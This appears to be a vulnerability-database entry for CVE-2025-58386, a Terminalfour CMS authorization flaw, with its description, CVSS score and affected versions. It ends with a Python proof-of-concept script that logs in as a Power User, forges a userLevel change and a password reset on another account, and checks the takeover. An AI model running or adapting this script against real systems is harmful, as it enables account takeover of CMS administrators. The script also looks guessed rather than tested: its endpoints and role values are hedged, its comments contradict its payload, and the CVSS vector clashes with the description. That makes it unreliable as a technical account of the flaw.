Security Vulnerability Report
CVE-2025-58386 CVSS 9.8 CRITICAL

Published: 2025-12-02 18:15:48
Last Modified: 2025-12-19 18:27:14

Description

In Terminalfour 8 through 8.4.1.1, the userLevel parameter in the user management function is not subject to proper server-side authorization checks. A Power User can intercept and modify this parameter to assign the Administrator role to other existing lower-privileged accounts, or invite a new lower-privileged account and escalate its privileges. While manipulating this request, the Power User can also change the target account's password, effectively taking full control of it.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:terminalfour:terminalfour:*:*:*:*:*:*:*:* - VULNERABLE
Terminalfour CMS 8.0
Terminalfour CMS 8.1
Terminalfour CMS 8.2
Terminalfour CMS 8.3
Terminalfour CMS 8.4
Terminalfour CMS 8.4.1
Terminalfour CMS 8.4.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-58386 PoC - Terminalfour Privilege Escalation
# Target: Terminalfour CMS 8.0 - 8.4.1.1
# Vulnerability: Insecure userLevel parameter in user management

target_url = "http://target-server/terminalfour/"

# Step 1: Login as Power User
login_url = target_url + "LoginServlet"
credentials = {
    "username": "poweruser",
    "password": "PowerUserPass123"
}
session = requests.Session()
response = session.post(login_url, data=credentials)

# Step 2: Get valid session token
session_token = session.cookies.get('JSESSIONID')

# Step 3: Intercept and modify user management request
user_mgmt_url = target_url + "UserManagerServlet"

# Original request (Power User promoting own account)
original_data = {
    "action": "updateUser",
    "userId": "100",
    "userLevel": "2",  # Original: Power User level
    "password": ""
}

# Modified request (Escalating to Administrator)
escalated_data = {
    "action": "updateUser",
    "userId": "101",             # Target: lower-privileged user
    "userLevel": "1",            # Modified: Administrator level (typically 1)
    "password": "HackedPass123!" # Optional: reset password
}

headers = {
    "Cookie": f"JSESSIONID={session_token}",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Step 4: Send escalated request
response = session.post(user_mgmt_url, data=escalated_data, headers=headers)

# Step 5: Verify privilege escalation
if response.status_code == 200:
    # Login with modified credentials to verify admin access
    admin_login = session.post(login_url, data={
        "username": "targetuser",
        "password": "HackedPass123!"
    })
    if "admin" in admin_login.text.lower() or admin_login.status_code == 200:
        print("[+] Privilege Escalation Successful!")
        print("[+] User 101 is now Administrator")
    else:
        print("[-] Escalation may have failed")
```

References

Vendor Advisory: https://docs.terminalfour.com/release-notes/security-notices/cve-2025-58386/
Product: https://terminalfour.com

Weakness
CWE-285 (Improper Authorization)

Affected Version Range (CPE match)
8.0.0 (inclusive) through 8.4.1.2 (exclusive)